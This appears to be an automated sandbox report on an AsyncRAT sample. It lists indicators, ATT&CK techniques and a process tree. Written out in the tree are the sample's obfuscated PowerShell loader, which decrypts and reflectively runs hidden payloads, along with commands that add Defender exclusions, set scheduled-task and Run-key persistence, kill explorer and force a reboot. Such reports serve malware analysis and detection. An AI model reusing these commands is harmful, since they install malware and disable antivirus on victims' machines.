asyncrat | bb484dd134c649c660dbde9ceb4fe1fbac7e65fb934d8a9c288c1e86d1b189f4

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation	Update.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk	Update.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk	Update.exe

Executes dropped EXE 5 IoCs

pid	Process
2788	Update.exe
19004	Update.exe
19260	Update.exe
20260	Update.exe
13840	Update.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update = "C:\\Users\\Admin\\AppData\\Roaming\\Update.exe"	Update.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\D:	Update.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp"	Update.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4864	2844	WerFault.exe	88

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
2896	taskkill.exe
20440	taskkill.exe
19584	taskkill.exe
19528	taskkill.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "227"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1604	schtasks.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
2844	powershell.exe
2844	powershell.exe
3172	powershell.exe
3172	powershell.exe
4456	powershell.exe
4456	powershell.exe
4076	powershell.exe
4076	powershell.exe
2788	Update.exe
1308	msedge.exe
1308	msedge.exe
19012	msedge.exe
19012	msedge.exe
19764	identity_helper.exe
19764	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
19012	msedge.exe
19012	msedge.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeDebugPrivilege	2844	powershell.exe
Token: SeDebugPrivilege	2788	Update.exe
Token: SeDebugPrivilege	3172	powershell.exe
Token: SeDebugPrivilege	4456	powershell.exe
Token: SeDebugPrivilege	4076	powershell.exe
Token: SeDebugPrivilege	2788	Update.exe
Token: SeDebugPrivilege	19004	Update.exe
Token: SeDebugPrivilege	19260	Update.exe
Token: SeDebugPrivilege	20260	Update.exe
Token: SeDebugPrivilege	20440	taskkill.exe
Token: SeDebugPrivilege	19584	taskkill.exe
Token: SeDebugPrivilege	19528	taskkill.exe
Token: SeDebugPrivilege	2896	taskkill.exe
Token: 33	19320	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	19320	AUDIODG.EXE
Token: SeDebugPrivilege	13840	Update.exe
Token: SeShutdownPrivilege	20068	shutdown.exe
Token: SeRemoteShutdownPrivilege	20068	shutdown.exe

Suspicious use of FindShellTrayWindow 28 IoCs

pid	Process
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
2788	Update.exe
2788	Update.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe
19012	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2788	Update.exe
2976	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 664 wrote to memory of 3672	664	cmd.exe	87
PID 664 wrote to memory of 3672	664	cmd.exe	87
PID 664 wrote to memory of 2844	664	cmd.exe	88
PID 664 wrote to memory of 2844	664	cmd.exe	88
PID 664 wrote to memory of 2844	664	cmd.exe	88
PID 2844 wrote to memory of 2788	2844	powershell.exe	90
PID 2844 wrote to memory of 2788	2844	powershell.exe	90
PID 2788 wrote to memory of 3172	2788	Update.exe	91
PID 2788 wrote to memory of 3172	2788	Update.exe	91
PID 2788 wrote to memory of 4456	2788	Update.exe	93
PID 2788 wrote to memory of 4456	2788	Update.exe	93
PID 2788 wrote to memory of 4076	2788	Update.exe	95
PID 2788 wrote to memory of 4076	2788	Update.exe	95
PID 2788 wrote to memory of 1604	2788	Update.exe	98
PID 2788 wrote to memory of 1604	2788	Update.exe	98
PID 2788 wrote to memory of 19012	2788	Update.exe	104
PID 2788 wrote to memory of 19012	2788	Update.exe	104
PID 19012 wrote to memory of 4564	19012	msedge.exe	105
PID 19012 wrote to memory of 4564	19012	msedge.exe	105
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 2984	19012	msedge.exe	106
PID 19012 wrote to memory of 1308	19012	msedge.exe	107
PID 19012 wrote to memory of 1308	19012	msedge.exe	107
PID 19012 wrote to memory of 2096	19012	msedge.exe	108
PID 19012 wrote to memory of 2096	19012	msedge.exe	108
PID 19012 wrote to memory of 2096	19012	msedge.exe	108

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rP6ipY8ykCrcY/vqOWugxQ2mrpqqQx5JkOzMlDOKmOA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GH3abWd9uo3DMEDckKzwyw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BZojv=New-Object System.IO.MemoryStream(,$param_var); $jqKwU=New-Object System.IO.MemoryStream; $YBFLc=New-Object System.IO.Compression.GZipStream($BZojv, [IO.Compression.CompressionMode]::Decompress); $YBFLc.CopyTo($jqKwU); $YBFLc.Dispose(); $BZojv.Dispose(); $jqKwU.Dispose(); $jqKwU.ToArray();}function execute_function($param_var,$param2_var){ $HnXah=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ASDSB=$HnXah.EntryPoint; $ASDSB.Invoke($null, $param2_var);}$HxmrU = 'C:\Users\Admin\AppData\Local\Temp\Loader.bat';$host.UI.RawUI.WindowTitle = $HxmrU;$YminX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HxmrU).Split([Environment]::NewLine);foreach ($LBczd in $YminX) { if ($LBczd.StartsWith('zyIAYTpLJuqqlwNwSYZB')) { $nGVNd=$LBczd.Substring(20); break; }}$payloads_var=[string[]]$nGVNd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
  2⤵
  PID:3672
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2844
- - C:\Users\Admin\AppData\Local\Temp\Update.exe
    "C:\Users\Admin\AppData\Local\Temp\Update.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Enumerates connected drives
    - Sets desktop wallpaper using registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Update.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3172
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4456
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Update.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4076
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Roaming\Update.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1604
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:19012
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8795046f8,0x7ff879504708,0x7ff879504718
        5⤵
        
        PID:4564
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
        5⤵
        
        PID:2984
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1308
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
        5⤵
        
        PID:2096
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
        5⤵
        
        PID:14096
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
        5⤵
        
        PID:19276
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4800 /prefetch:8
        5⤵
        
        PID:19592
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4800 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:19764
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM explorer.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:20440
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM explorer.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:19584
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM explorer.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:19528
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /F /IM explorer.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2896
  - - C:\Windows\SYSTEM32\shutdown.exe
      shutdown.exe /f /r /t 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:20068
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 83688
    3⤵
    - Program crash
    PID:4864

C:\Users\Admin\AppData\Roaming\Update.exe
C:\Users\Admin\AppData\Roaming\Update.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:19004

C:\Users\Admin\AppData\Roaming\Update.exe
C:\Users\Admin\AppData\Roaming\Update.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:19260

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:19164

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:19036

C:\Users\Admin\AppData\Roaming\Update.exe
C:\Users\Admin\AppData\Roaming\Update.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:20260

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x524 0x4cc
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:19320

C:\Users\Admin\AppData\Roaming\Update.exe
C:\Users\Admin\AppData\Roaming\Update.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:13840

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3903855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2844 -ip 2844
1⤵
PID:20000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery